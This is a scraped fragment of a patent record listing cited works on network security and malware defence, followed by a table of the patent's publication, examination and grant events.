| Lin et al. | Secure and transparent network traffic replay, redirect, and relay in a dynamic malware analysis environment | |
| Tang et al. | Concept, characteristics and defending mechanism of worms | |
| Nagesh et al. | A survey on denial of service attacks and preclusions | |
| AT&T | ||
| CN114650210B (en) | Alarm processing method and protection equipment | |
| Kumar et al. | Malicious Lateral Movement in 5G Core With Network Slicing And Its Detection | |
| Bakhit et al. | DAGGER: Distributed architecture for granular mitigation of mobile based attacks |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| C06 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |